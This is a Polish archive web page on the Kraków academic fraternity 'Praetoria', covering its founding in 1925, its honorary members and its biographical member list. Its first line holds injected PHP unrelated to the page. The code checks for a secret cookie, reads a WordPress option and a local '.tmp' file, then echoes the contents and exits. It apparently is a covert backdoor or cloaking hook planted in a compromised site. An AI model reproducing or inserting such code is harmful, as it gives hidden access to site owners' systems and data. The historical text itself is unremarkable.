if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Praetoria

Dekiel NN Nazwa:
Polska Korporacja Akademicka “Praetoria”
Siedziba:
Kraków
Data powstania:
25 (?) I 1925 r.
Barwy:
fioletowa – złota – zielona
Dewiza:
„Virtute dux - comite fortuna”, („Gdy przewodnikiem jest męstwo, towarzyszem będzie przyjazny los”)

Rys historyczny

Szarfa prezydialna Praetorii.

Praetoria została założona 25 I 1925 r. Jej szczególnym celem była praca na rzecz polskości “kresów wschodnich, ich uświadomieniem narodowym i dla ich wielkości kulturalnej i gospodarczej”. Dnia 27 IV 1925 r. została członkiem kandydującym w Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 27 (?) IV 1925 r.). Kandydowała pod opieką K! Gnomia. Dnia 24 VI 1926 uzyskała prawa członka rzeczywistego Związku. W latach 1933-35 pozostawała poza jego strukturami.

Legitymacja członkowska Ludwika Korwin-Piotrowskiego z 1926 r.

W 1928 r. ufundowała sztandar, którego poświęcenie odbyło się 5 V 1928 r. W roku akademickim 1930/31 Praetoria przewodniczyła Krakowskiemu Kołu Międzykorporacyjnemu. W styczniu 1935 r. z okazji X-lecia Korporacji odbył się I Zjazd Filistrów.

Całkowita ustalona, choć niekompletna imienna lista członków Praetorii obejmuje 81 nazwisk, w tym pięciu członków honorowych. W 1938 r. Praetoria liczyła 66 członków, w tym trzech członków honorowych.

Listownik Praetorii, 1931 r.

O działalności Praetorii, a także o spotkaniach jej członków w czasie wojny i w okresie powojennym brak jakichkolwiek danych.

Lista członków

Poniższa, niekompletna lista członków Praetorii obejmuje kilkadziesiąt nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Ignacy Chrzanowski, (5 lutego 1866 w Stoku, województwo lubelskie - 19 stycznia 1940 w Sachsenhausen) z rodziny ziemiańskiej, s. Bolesława i Heleny z Dmochowskich, prof. UJ, wykładowca historii literatury polskiej oraz źródeł historycznych do literatury polskiej, w 1931 wskutek tzw. reformy jędrzejewiczowskiej pozbawiony katedry i przeniesiony na emeryturę, później mianowany prof. honorowym, badacz literatury polskiego odrodzenia, oświecenia i romantyzmu, dziejów myśli filozoficznej w literaturze polskiej, kulturze średniowiecznej oraz polskiej literaturze religijnej, od 1906 członek-korespondent, od 1914 członek czynny AU (PAU); przewodniczący Komisji Historii Filozofii Polskiej AU i Komisji Historii Literatury Polskiej PAU, członek Komisji Języka Polskiego AU, członek-założyciel Warszawskiego Towarzystwa Naukowego, członek Poznańskiego Towarzystwa Przyjaciół Nauk oraz Towarzystwa Naukowego we Lwowie, uhonorowany Księgą pamiątkową ku czci Ignacego Chrzanowskiego (1936, z okazji 70-lecia urodzin), doktor honoris causa UJ 1919 oraz UP 1938, Filister honorowy Praetorii, w listopadzie 1939 aresztowany przez Niemców w ramach Sonderaktion Krakau, więziony w Krakowie, Wrocławiu i Sachsenhausen, zmarł w obozie na zapalenie płuc, odznaczony Krzyżem Komandorskim Orderu Polonia Restituta
 2. Roman Dybowski, (19 listopada 1883 w Cieszynie - 1 czerwca 1945 roku w Krakowie) student UJ, doktorat Wiedeń 1905, filolog polski, historyk i tłumacza literatury angielskiej, od 1911 prof. UJ, kierownik Katedry Filologii Angielskiej, w czasie I wojny światowej dowódca Kompanii 16. Pułku Piechoty Obrony Krajowej, w grudniu 1914 dostał się do niewoli i został wysłany na Syberię, od 1923 członek korespondent, a od 1931 członek czynny PAU, dziekan Wydziału Filozoficznego UJ 1930/31, Filister honorowy Praetorii, autor wspomnień z czasów I wojny światowej oraz rewolucji i okresu następnego “Siedem lat w Rosji i na Syberii” (Warszawa 2007)
 3. Władysław Konopczyński, (26 listopada 1880 w Warszawie - 12 lipca 1952 w Młynniku k. Ojcowa), s. Ignacego i Ludwiki z Obrąpalskich, uczeń Gimnazjum Górskiego i IV Gimnazjum w Warszawie 1891-99, studiował prawo na UW 1899-1904 oraz historię na Uniwersytecie Lwowskim 1907-08, doktorat 1908, w pracy naukowej zajmował się historią Polski XVII i XVIII wieku, historią państwa i prawa polskiego, historią parlamentaryzmu europejskiego, edytorstwem i biografistyką, habilitacja UJ 1911, docent w Katedrze Historii Powszechnej UJ 1911, od 1917 prof. nadzw. i kierownik Katedry Historii Polski Nowożytnej i Najnowszej, w czasie wojny polsko-bolszewickiej 1920 instruktor artylerii, prof. zw. 1921, dziekan Wydziału Filozoficznego 1939, członek rzeczywisty 1908 oraz członek czynny 1929 Towarzystwa Naukowego Warszawskiego, członek-korespondent 1922 oraz członek czynny 1933 PAU, inicjator, a w latach 1931-49 przewodniczący Komitetowi Redakcyjnego Polskiego Słownika Biograficznego, Filister honorowy Praetorii, aktywny politycznie, w latach 1922-27 poseł z ramienia Związku Ludowo-Narodowego, w listopadzie 1939 zatrzymany wraz z innymi pracownikami UJ w ramach Sonderaktion Krakau, więziony w Krakowie, Wrocławiu i obozie koncentracyjnym Sachsenhausen, zwolniony w lutym 1940, w latach wojny wykładowca na tajnym UJ, w 1948 oskarżony przez komunistyczne władze o publikacje “szowinistycznie obciążone” i przepojone “furią rasistowską” zmuszony do rezygnacji z pracy, odznaczony m.in. Krzyżem Oficerskim szwedzkiego Orderu Gwiazdy Polarnej oraz Krzyżem Oficerskim francuskiej Legii Honorowej, erudyta i poliglota (14 języków)
 4. Bogdan Szyszkowski, (20 lipca 1873 w Trybuchach na Podolu - 13 sierpnia 1931 w Myślenicach) absolwent Wydziału Matematyczno-Przyrodniczego Uniwersytetu w Kijowie 1893-98, chemik, fizykochemik, pobyty badawcze w Anglii, Francji, Niemczech i Szwecji 1899-1916, w latach 1916-1919 rektor Polskiego Kolegium Uniwersyteckiego w Kijowie, prof. UJ 1920-22, prof. i kierownik Katedery Chemii Fizycznej AG 1922-31, twórca równania opisującego zależność między napięciem powierzchniowym a stężeniem roztworu, które zostało nazwane jego imieniem, członek Polskiego Towarzystwa Chemicznego, w latach 1921-22 przewodniczący jego krakowskiego oddziału, następnie wiceprezes 1927-29 i prezes 1929-30 Towarzystwa, od 1929 członek-korespondent PAU, kurator i Filister honorowy Praetorii
 5. Ksawery Sariusz-Zaleski (Saryusz-Zaleski), (31 maja 1857 - zm. 1929-38) z Pustowarni w gub. kijowskiej brat Antoniego, Seweryna i Tadeusza (Arkonia), student Wydziału Chemicznego PR 1878-1883, początkowo należał do Korporacji Borysthenia, a następnie przyjęty do Arkonii 1880 (nr ew. 181), inż., gospodarował we własnych dobrach Derżów w Galicji, po I wojnie światowej mieszkał w Krakowie, Filister honorowy Praetorii

Członkowie rzeczywiści

 1. Jan Armanowicz, student filozofii UJ, c. 1930
 2. Bolesław Bielczyk, student rolnictwa UJ, c. 1930
 3. Kazimierz Błażewicz, student i absolwent Wydziału Górniczego AG, akt. 1937-39, sekretarz sem. zim. 1938/39, po wojnie na emigracji w Wielkiej Brytanii
 4. Bohdan Bobiatyński, student i absolwent rolnictwa UJ, akt. 1929-31, w 1938 w maj. Cwicin w pow. Dzisna
 5. Julian (Juljusz) Bobilewicz, student prawa UJ, c. 1930, akt. 1930-39
 6. Marian Bujalski, student i absolwent rolnictwa UJ, założyciel Praetorii, w 1938 w Zarządzie Dóbr Poddniestrzańskich w Chodorowie
 7. Sławomir Bukowiński, (17 maja 1911 w Sansygniowie - po 1976) s. Konstantego, absolwent Gimnazjum Matematyczno-Przyrodniczego Józefa Piłsudskiego w Białymstoku, student i absolwent Wydziału Górniczego AG 1931-47, akt. 1937-39, wiceprezes 1938/39, uczestnik wojny obronnej 1939 w 6 Dywizjonie Artylerii Ciężkiej, po wojnie w przemyśle górniczym, m.in. referent techniczny Wojewódzkiego i Okręgowego Urzędu Górniczego w Krakowie 1945-48, inspektor górniczy i kierownik działu górniczego w Krakowskich Zakładach Przemysłu Surowców Mineralnych 1948-50, kierownik pracowni geologicznej Przedsiębiorstwa Geologicznego Surowców Skalnych w Krakowie, dyrektor techniczny Wrocławskiego Przedsiębiorstwa Geologiczno-Górniczo-Węglowego 1956-58, adiunkt naukowo-badawczy w Głównym Instytucie Górniczym w Katowicach 1959-64 oraz w Zakładach Konstrukcyjno-Mechanizacyjnych Przemysłu Węglowego w Katowicach 1965-76
 8. Władysław Bukowiński, (22 grudnia 1904 w Berdyczowie - 3 grudnia 1974 w Karagandzie) student i absolwent prawa UJ, założyciel Praetorii, kapłan archidiecezji krakowskiej, wyświęcony 1931, wikariusz i katechata w Rabce 1931-35, w Suchej Beskidzkiej 1935-36, wykładowca katechetyki i socjologii w Seminarium Duchownym w Łucku 1936-39, generalny sekretarz Diecezjalnym Instytutu Akcji Katolickiej, dyrektor Wyższego Instytutu Wiedzy Religijnej i zastępca redaktora “Życia Katolickiego”, po wkroczeniu Sowietów proboszcz katedry w Łucku, w 1940 aresztowany i skazany na 8 lat łagrów, w 1941 cudem uniknął śmierci w czasie rozstrzelania więźniów w więzieniu w Łucku, po wkroczeniu Niemców ponownie proboszcz katedry w Łucku, aresztowany w 1945 i zesłany na 10 lat do łagru, początkowo w obozie Bakał w obwodzie czelabińskim, a później w obozie przy kopalni miedzi w Dżezkazganie, zwoloniony w 1955 z administracyjnym zesłaniem na trzy lata do Karagandy, mimo możliwości powrotu do Polski pozostal wśród wiernych w Kazachstanie, przyjął obywatelstwo radzieckie, w 1957 (?) ponownie aresztowany i uwięziony na 3 lata, przebywał w obozie pracy w Czumie w obwodzie irkuckim i obozie dla “religiozników” w Sosnówce, w 1961 wrócił do Karagandy, w latach 1963-73 trzykrotnie odwiedził Polskę, Sługa Boży, trwa proces beatyfikacyjny, pośmiertnie odznaczony Krzyżem Komandroskim OOP, autor publikowanych wspomnień (Wspomnienia z Kazachstanu, Paryż, Rzym 1981, Gdańsk 1989)
 9. Stanisław Cholewicki, (22 grudnia 1908 na Zabajkalu - 9 września 1975 we Wrocławiu) s. Leona, dzieciństwo w Charbinie w Mandżurii, absolwent Gimnazjum Humanistycznego im. Henryka Sienkiewicza w Charbinie, w 1929 repatriacja do Polski, student i absolwent Wydziału Górniczego AG 1929-49, akt. 1938-39, skarbnik sem. zim. 1938/39, asystent AG 1935-49, kierownik robót górniczych Kamieniołomów Granitu w Zimniku 1949-50, kierownik działu Kamieniołomów Śląskich w Świdnicy 1950-51, kierownik działu górniczego Zjednoczenia Kamieniołomów Drogowych we Wrocławiu 1951-59, inspektor Zjednoczenia Przemysłu Węgla Brunatnego 1959-70, naczelny redaktor wydawnictw górniczych w Instytucie Górniczym UWr., pochowany na Cmentarzu Grabiszyńskim we Wrocławiu
 10. Bronisław Czaiński, inż., w latach 30-tych w Brześciu n. Bugiem
 11. Antoni Czechowicz, (3 stycznia 1908 w Wiatce w Rosji - 3 listopada 1992 w Warszawie) herbu Ostoja, z Ziemi Wileńskiej, s. Romualda, absolwent Gimnazjum im. Joachima Lelewela, student i absolwent Wydziału Hutniczego (inż. metalurg) AG 1925-34, założyciel Praetorii, akt. 1925-1932, prezes sem. zim. 1929/30, olderman sem. zim. 1931/32, filister 1938/39, inż. ruchu w Walcowni Metali Dziedzice 1934-36, asystent stalowni w Zakładach Starachowickich 1936-39, ppor. 3 Brygady Wileńskiej AK, uczestnik operacji “Burza” - “Ostra Brama”, więzień łagru w Kałudze, współtwórca powojennego hutnictwa w Polsce, m.in. naczelny dyrektor hut “Kościuszko” 1946-48, Hajduckich Zakładów Hutniczych 1948-49, “Częstochowa” 1949-51, “Stalowa Wola” 1951-54, “Nowej Huty” 1954-58, podsekretarz stanu w Ministerstwie Przemysłu Ciężkiego 1958-66, z-ca przewodniczącego Komitetu Współpracy Gospodarczej z Zagranicą 1966-71, odznaczony dwukrotnie Orderem Sztandaru Pracy, Krzyżem Komandorskim OOP, Laureat Nagrody Państwowej w Dziedzinie Postępu Technicznego, członek Światowego Związku Armii Krajowej
 12. Ludwik Dankmeyer, student i absolwent filozofii UJ, akt. 1929-31, w 1938 w Krakowie
 13. Wawrzyniec Dąbrowski, student i absolwent rolnictwa UJ, akt. 1929-31, w 1938 w Katowicach
 14. Henryk Domurat, student ASP, c. 1938, akt. 1938-39, w 1938 w Katowicach
 15. Jan Fidelus, student UJ, c. 1938, akt. 1938-39
 16. Janusz Gerulewicz, akt. 1937-39
 17. Henryk Godlewski, student UJ, olderman sem. zim. 1938/39
 18. Zdzisław Grzęski, student i absolwent prawa (?) UJ, akt. 1937-39, w 1938 w Sądzie Grodzkim w Pińczowie
 19. Józef Henelt, w 1938 w Krakowie
 20. Janusz Ihnatowicz, student i absolwent rolnictwa UJ, akt. 1929-31, w 1938 w Warszawie
 21. Zygmunt Jenike, student i absolwent rolnictwa UJ, akt. 1929-31, wiceprezes sem. let. 1930/31, w 1938 w Warszawie
 22. Antoni Jędrzejowski, student i absolwent rolnictwa UJ, c. 1930, w 1938 w Krakowie
 23. Stefan Karczyński, student ASP, c. 1938, akt. 1938-39
 24. Janusz Kieniewicz, student AG, założyciel Praetorii, akt. 1929-31, w 1938 pracownik Zakładów Starachowickich w Starachowicach
 25. Bogdan Kołomyjski, (5 stycznia 1904 w Brześciu nad Bugiem - ) s. Karola, absolwent Gimnazjum R. Traugtta w Brześciu nad Bugiem, student PW 1922-24, student i absolwent student Wydziału Hutniczego AG 1924-30, założyciel Praetorii, po studiach m.in. pracownik Fabryki Amunicji w Skarżysku 1931-33, zastępca szefa wydziału walcowni w Starachowickich Zakładach Górniczych 1933-39, na robotach przymusowych w Niemczech 1944-45, szef planowania 1945-46 dyrektor techniczny 1946-48 i dyrektor naczelny 1948-51 w Hucie “Pokój” w Nowym Bytomiu, główny inż. w Centralnym Zarządzie Przemysłu Hutniczego w Katowicach 1951-53, główny inż. Huta “Kościuszko” w Chorzowie 1953-56, dyrektor Huty “Baildon w Katowicach 1956-58, dyrektor naczelny Huty im. Lenina w Krakowie 1958-71, od 1971 na emeryturze
 26. Konstanty Korszon, student fil. UJ, założyciel Praetorii, akt. 1925-31, prezes Praetorii i Krakowskiego Koła Międzykorpracyjnego sem. let. 1930/31, inż., w 1938 w Krakowie
 27. Jerzy Kowalski, student UJ, akt. 1937-39
 28. Wacław Kozioł, student UJ, akt. 1937-39, w 1938 w Chroberzu w woj. kieleckim
 29. Leonard Kuntze, w 1938 w Krakowie
 30. Aleksander Leśniewicz, (17 czerwca 1904 w Dżurynie pow. Jampol - ) student i absolwent med. UJ, założyciel Praetorii, dr med. 1929, chirurg, w 1938 w Łodzi
 31. Joachim Leśniewicz, student i absolwent rolnictwa UJ, akt. 1929-31, w 1938 w maj. Parainowie w woj. białostockim
 32. Kazimierz Lityński, student i absolwent rolnictwa UJ, akt. 1929-31, w 1938 w Pożeżynie w pow. Brześć n. Bugiem
 33. Wacław Luty, (18 września 1914 w Stoczku Łukowskim - po 1971) absolwent Gimnazjum im. Bolesława Prusa w Siedlcach, student i absolwent Wydziału Hutniczego AG 1934-45, c. 1938, akt. 1938-39, uczestnik wojny obronnej 1939, po studiach pracował m.in. w Hucie Stalowa Wola, Hucie “Warszawa” oraz Instytucie Mechaniki Precyzyjnej w Warszawie, doktorat 1965, habilitacja 1971
 34. Marceli Łepkowski, student WSH, c. 1930
 35. Kazimierz Magiera, (8 lipca 1908 w Samborze - prawd. po 1979) s. Wawrzyńca, absolwent Gimnazjum w Poznaniu, student i absolwent Wydziału Górniczego AG 1928-36, po studiach pracował m.in. w kopalni “Paweł” w Chebzie, Polskich Kopalniach Skarbowych w Chorzowie, kopalni “Bielszowice” w Bielszowicach, kopalni “Barbara-Wyzwolenie” w Chorzowie, kopalni “Wyzwolenie” w Łagiewnikach Śląskich, kopalni “Barbara” w Chorzowie, uczestnik wojny obronnej 1939, w niewoli niemieckiej w oflagu 1939-45, po wojnie pracował m.in. w kopalniach “Piast-Ziemowit” w Lędzinach, “Prezydent” w Chorzowie, w Chrzanowskim Zjednoczeniu Przemysłu Węglowego, naczelnik wydziału w dyrekcji inwestycji Ministerstwa Górnictwa i Energetyki w Warszawie 1950-63, główny inż. ds. projektowych w Rybnickim Zjednoczeniu Przemysłu Węglowego 1964-69
 36. Antoni Markiewicz, student i absolwent filozofii UJ, akt. 1929-31, w 1938 w Zakopanym
 37. Kazimierz Matusewicz (Matusiewicz), student i absolwent rolnictwa UJ, akt. 1929-31, w 1938 w Cwiecinie poczta Jazno
 38. Czesław Mazurek, student WSH, c. 1930
 39. Zdzisław Nadarkiewicz, (19 października 1911 w Lublinie - po 1976)absolwent Gimnazjum Vetterów w Lublinie, student i absolwent Wydziału Górniczego AG 1928-39, akt. 1929-39, sekretarz zewn. Praetorii oraz Krakowskiego Koła Międzykorporacyjnego sem. let. 1930/31, po studiach pracownik m.in. kopalni rudy żelaza w Chlewiskach, dyrektor Rejonu Kopalni Rudy Żelaza w Konopiskach 1946-50, p.o. dyrektora i główny inż. kopalni rudy żelaza “Barbara” w Dźbowie 1951-55, naczelny inż. 1955-57 oraz dyrektor 1958-60 Łęczyckich Zakładów Górniczych, zastępca dyrektora ds. inwestycji kopalni węgla brunatnego “Konin” 1960-67, naczelny inż. i adiunkt w Centralnym Ośrodku Badawczo-Projektowym “Poltegor” we Wrocławiu 1969-76, starszy wykładowca Instytutu Górnictwa PWr. 1969-76, od 1976 na emeryturze
 40. Stanisław Nadwodzki, ( - przed 1938) pilot wojskowy, por.
 41. Michał Nosowicz, (28 września 1906 w Saratowie - po 1971), s. Michała absolwent Gimnazjum im. Joachima Lelewela w Wilnie, student i absolwent Wydziału Hutniczego AG 1925-32, założyciel Praetorii, akt. 1929-31, kierownik laboratorium metaloznawczego Walcowni Metali w Dziedzicach 1933-39, uczestnik wojny obronnej 1939, internowany na Węgrzech 1939-40, w PSZ na Zachodzie 1940-46, kierownik kontroli fabrykacji 1946-49 oraz laboratorium chemicznego 1954-57 Huty “Kościuszko” w Chorzowie , starszy asystent 1957-59 oraz kierownik laboratorium metaloznawczego 1960-71 w Zakładzie Badawczym Huty “Batory” w Chorzowie , od 1971 na emeryturze
 42. Jan Nowacki, student UJ, akt. 1938-39, prezes sem. zim. 1938/39
 43. Stanisław Nowak, student prawa UJ, c. 1930
 44. Zygmunt Onufrowicz, inż., w 1938 w Krakowie
 45. Antoni Ostrowski, student i absolwent prawa UJ, prokurator, w 1938 w pracownik prokuratury w Grodnie, po wojnie prawd. na emigracji w Wielkiej Brytanii
 46. Witold Parysiewicz, (15 listopada 1907 w Sosnowcu -6 maja 1967 w Warszawie), s. Stanisława, absolwent Gimnazjum w Chorzowie, student i absolwent Wydziału Górniczego 1926-33, akt. 1927-29 (?) w Praetorii, sekretarz 1928, prawd. wystąpił z Preatorii i wstąpił do Gnomii, akt. 1930-31 w Gnomii, filister 1938/39, po studiach pracownik kopalni “Wujek” w Katowicach 1933-39 i od 1945, po wojnie dyrektor 1946-49, główny inż. górniczy w Przedsiębiorstwie Budowy Zakładów Górniczych w Mikołowie 1949-50, dyrektor techniczny Przedsiębiorstwa Budowy Zakładów Przemysłu Węglowego “Wschód” w Mikołowie 1950-52, dyrektor Biura Projektów Nowych Kopalń w Gliwicach 1955-64, od 1955 wykładowca PŚ, doktorat 1962, prof. nadzw. 1965, kierownik Katedry Eksploatacji Złóż 1955-67, dziekan Wydziału Górniczego 1966-67
 47. Włodzimierz Perłowski ( - po 1975), student med., akt. 1927-29 (?) w Praetorii, olderman 1928, prawd. wystąpił z Preatorii i wstąpił do Akropolii, akt. 1930/31 w Akropolii
 48. Teodor Piliński, student ASP, c. 1938, akt. 1938-39
 49. Ludwik Piotrowski (Korwin-Piotrowski), (15 sierpnia 1904 w Żegiestowie Zdroju - 1988) założyciel Praetorii, akt. 1925-29 (?), pierwszy sekretarz 1925, prezes 1928, prawd. wystąpił z Preatorii i wstąpił do Akropolii, filister Arkopolii 1930/31, dr med., balneolog, w 1956 w Bytomiu
 50. Zygmunt Pithart, student i absolwent rolnictwa UJ, akt. 1929-32, gospodarz sem. let. 1930/31, prezes sem. zim. 1931/32, w 1938 w Cielętnikach w pow. radomskim
 51. Stanisław Późniak (Poźniak), (26 lipca 1903 w Koziatynie - 4 kwietnia 1945 w Bergen Belsen) student i absolwent Wydziału Hutniczego AG 1923-30/34, szef stalowni Zakładów Metalurgicznych w Ostrowcu Świętokrzyskim n. Kamienną 1935-39, szef stalowni Huty “Trzyniec” 1939, nauczyciel szkoły przyzakładowej w Hucie Ostrowiec 1939-41, kierownik sklepu Handel Żelazem w Warszawie 1941-44, aresztowany w 1944 w Radomiu, więziony w obozach koncentracyjnych w Gross Rosen oraz Bergen Belsen, gdzie zmarł z wyczerpania
 52. Zygmunt Przednikiewicz, student AG, założyciel Praetorii, w 1938 w Brześciu n. Bugiem
 53. Antoni Pucek, student ASP, c. 1938, akt. 1938-39
 54. Antoni Puzynowicz, student med. UJ, założyciel Praetorii
 55. Adam Ronikier, student i absolwent rolnictwa UJ, akt. 1929-32, sekretarz wewn. sem. let. 1930/31, sekretarz sem. zim. 1931/32, w 1938 w Krakowie
 56. Jan Rudowski, (14 stycznia 1910 - 11 grudnia 1983) s. Tadeusza Rudowskiego i Maria z Choynowskich, brat stryjeczny Jerzego i Zygmunta (obaj Sarmatia), brat stryjeczny Józefa, Leonarda i Szymona (wszyscy Sarmatia), brat stryjeczny Stanisława (Jagiellonia), brat stryjeczny Jana i Zygmunta (Helania), brat stryjeczny Michała (Corona), student i absolwent rolnictwa UJ, akt. 1929-31, olderman Praetorii oraz skarbnik Krakowskiego Koła Międzykorporacyjnego sem. let. 1930/31, od 1935 właściciel maj. Koszelewy w pow. działdowskim
 57. Zbigniew Rychlicki, student i absolwent rolnictwa UJ, akt. 1929-32, wiceprezes zewn. Praetorii oraz Krakowskiego Koła Międzykorporacyjnego sem. let. 1930/31, wiceprezes sem. zim. 1931/32, w 1938 w Zarządzie Dóbr w Zatorze
 58. Tadeusz Rydosz, student ASP, c. 1938, akt. 1938-39
 59. Karol Juljan Ryglewicz, (21 sierpnia 1900 w Dąbrowie Rusieckiej w woj. łódzkim - 22 stycznia 1955 w Bytomiu) s. Karola i Julii ze Szmidtów, matura Kostroma w Rosji, student med. Kostroma i UJ, ochotnik WP 1920, założyciel Praetorii, prezes Koła Filistrów 1930/31, dr med. UJ 1928, habilitacja AM w Poznaniu 1951, prof. Śląskiej AM 1953-55, ginekolog i położnik, członek Poznańskiego Towarzystwa Lekarskiego, Polskiego Towarzystwa Lekarskiego i Polskiego Towarzystwa Ginekologicznego, zmarł tragicznie
 60. Józef Sokołowski, akt. 1927-29 (?) w Praetorii, wiceprezes 1928, prawd. wystąpił z Preatorii i wstąpił do Gnomii, akt. 1930/31 w Gnomii, filister 1938/39, inż.
 61. Sławomir Spychalski, student ASP, c. 1938, akt. 1938-39
 62. Wilhelm Strużyna, student AG, akt. 1937-39 [być może Jan Strużyna (8 grudnia 1915 w Irbit w Rosji - prawd. po 1979) s. Jana, absolwent Gimnazjum Matematyczno-Przyrodniczego im. Stanisława Kostki w Królewskiej Hucie, student i absolwent Wydziału Hutniczego AG 1934-49, pracowni przemysłu hutniczego]
 63. Julian Michał Sulima-Samójłło (po wojnie Sulima Samujłło), (6 kwietnia 1907 w Warklanach na Łotwie - 5 kwietnia 1985 w Krakowie) absolwent Gimnazjum Humanistycznego im. Henryka Sienkiewicza w Charbinie w Mandżurii, student i absolwent Wydziału Górniczego AG 192?-1939, c. 1930, akt. 1930-39, po studiach m.in. urzędnik techniczny w Okręgowym Biurze Pomiarowym w Krakowie 1940-45, dyrektor techniczny Kamieniołomów Śląskich w Świdnicy 1948-50, od 1951 wykładowca AGH, docent 1959, prof. nadzw. 1967, kierownik Zakładu Górnictwa Odkrywkowego 1958-64, kierownik Katedry Górnictwa Odkrywkowego 1964-69, zastępca dyrektora Instytutu Górnictwa Odkrywkowego 1969-77, kierownik Zakładu Projektowania i Robót Wydobywczych 1969-73, kierownik Zakładu Robót Strzelniczych 1973-77, organizator i kierownik Centralnego Laboratorium Materiałów Wybuchowych i Techniki Strzelniczej przy Instytucie Górnictwa Odkrywkowego 1973-77, prodziekan Wydziału Górniczego 1956-60 oraz 1964-66, od 1977 na emeryturze
 64. Longin Szlachetko, student UJ, akt. 1937-39
 65. Marian Szyszko-Bohusz, (1901-1995) student ASP, założyciel Praetorii, w 1938 wykładowca (?) na Wieczornych Kursach Dokształcających w Gdyni
 66. Wincenty Taurogiński, student i absolwent filozofii UJ, akt. 1929-31, w 1938 w Krakowie
 67. Walerian Terajewicz, (15 lutego 1906 w Petersburgu - ) student i absolwent 1931 med. UJ, założyciel Praetorii, dr med. (?), chirurg, w 1956 w Olsztynie
 68. Antoni Towpik, (26 luty 1906 w Berezie Kartuskiej -1992) absolwent Gimnazjum w Brześciu n. Bugiem, student i absolwent Wydziału Górniczego AG 1928-37, po studiach asystent mierniczy w Biurze Mierniczym w Wełnowcu 1934-39 (Towarzystwo Hohenloe ?), uczestnik wojny obronnej 1939 w oddziałach gen. Franciszka Kleeberga, kierownik grupy geologicznej w Instytucie Geologicznym w Warszawie 1940-41, kierownik kopalni kredy i torfu w Berezie Kartuskiej 1941-44, kierownik Kamieniołomu “Kozia Góra” w Rykoszynie 1944-45, kierownik wydziału pomiarów dołowych 1945-51 oraz główny mierniczy 1951-54 w Bytomskim Zjednoczeniu Przemysłu Węglowego, wicedyrektor Okręgowego Urzędu Górniczego w Krakowie 1956-72, wykładowca AGH 1958-62, od 1972 na emeryturze
 69. Czesław Twardowski, (1914 - 4 stycznia 2010 w Calgary) po wojnie na emigracji w Kanadzie
 70. Franciszek Tybulczuk, (21 września 1907 w Charbinie w Chinach - po 1970) s. Antoniego, absolwent Gimnazjum w Charbinie w Mandżurii, absolwent Wyższej Szkoły Eksportowej we Lwowie 1925-26, student i absolwent Wydziału Górniczego AG 1926-32, akt. 1929-31, skarbnik wewn. sem. let. 1930/31, filister 1938/39, po studiach m.in. zastępca kierownika działu mierniczego Wspólnoty Interesów w Katowicach 1933-39, kierownik działu mierniczego Dyrekcji Kopalń “Donnersmarck” w Świętochłowicach 1939, kierownik działu mierniczego w Bytomskim Zjednoczeniu Przemysłu Węglowego 1945-50, kierownik działu górniczego Biura Projektów Przemysłu Węglowego 1950-54, dyrektor Przedsiębiorstwa Mierniczo-Górniczego w Bytomiu 1954-59, kierownik działu górniczego w Biurze Projektów Przemysłu Metali Nieżelaznych “Bipromet” w Katowicach 1959-68, główny geodeta resortu Centralnego Urzędu Geologii w Warszawie 1968-70, od 1970 na emeryturze
 71. Franciszek Wilczyński, ( - przed 1938) student i absolwent med. UJ, założyciel Praetorii, pierwszy prezes 1925, dr med. 1928, psychiatra, w 1931 pracownik szpitala na Dziekance w Gnieźnie
 72. Jan Zawadzki, student i absolwent rolnictwa UJ, akt. 1929-31, w 1938 w Ciągowicach poczta Łazy
 73. Dominik Zdziebło, w 1938 w Krakowie
 74. Jerzy Zitzman, student ASP, c. 1938, akt. 1938-39
 75. Stanisław Żejmo-Żejmis, student i absolwent fil. UJ, założyciel Praetorii, dr, w 1938 we Lwowie
 76. Teofil Żurakowski, student AG, c. 1930, w 1938 w Haliczanach poczta Boroczyce na Wołyniu

Pieczęć Praetorii, 1931 r.

Listę członków opracowano na podstawie:

1) “Praetoria” Korporacja Akademicka w Krakowie, (w:) Biuletyn Krakowskiego Koła Międzykorporacyjnego. Za semestr letni roku akademickiego 1930-1931, Kraków 1931, s. 29 i n.,
2) Praetoria Polska Korporacja Akademicka, (w:) Biuletyn Krakowskiego Koła Międzykorporacyjnego. Za semestr letni roku akademickiego 1938-1939, Kraków 1938, s. 26 i n.,
3) Julian Sulima-Samujłło, Księga wychowanków i wychowawców Akademii Górniczej w Krakowie 1919-1949, Kraków 1979,
4) materiałów archiwalnych z Archiwum Korporacyjnego,
5) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Praetoria.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 14 II 2010 r.
Ostatnia zmiana: 29 X 2013 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Polska Korporacja Akademicka “Praetoria” (Kraków), (na:) www.archiwumkorporacyjne.pl, stan 29 X 2013 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }